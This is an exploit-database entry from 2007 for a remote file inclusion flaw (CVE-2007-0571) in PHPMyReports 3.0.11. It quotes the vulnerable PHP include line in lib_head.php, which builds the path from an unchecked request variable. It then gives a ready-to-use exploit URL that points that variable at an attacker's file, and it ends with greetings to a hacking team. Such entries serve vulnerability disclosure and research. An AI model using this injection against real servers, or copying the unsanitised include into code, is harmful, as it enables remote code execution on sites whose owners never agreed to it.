PHPMyReports 3.0.11 - 'lib_head.php' Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-01-26
date_updated:
verified: 1
codes: OSVDB-33003;CVE-2007-0571
tags:
aliases:
screenshot_url:
application_url:
=================================================================
URL.S = http://www.phpmytools.org/pmr3.0.11_20050105.tar.gz !
=================================================================
Finded by GolD_M = Mahmood_ali && Google.Com !
=================================================================
Greetz For : Tryag-Team & 020 :) !
=================================================================
/include/lib/lib_head.php !
=================================================================
<?php require "$cfgPathModule/my_javascript_inc.php"; ?> !
=================================================================
Exploit !
=================================================================
[path]/include/lib/lib_head.php?cfgPathModule=Evil.txt? !
=================================================================
# milw0rm.com [2007-01-27]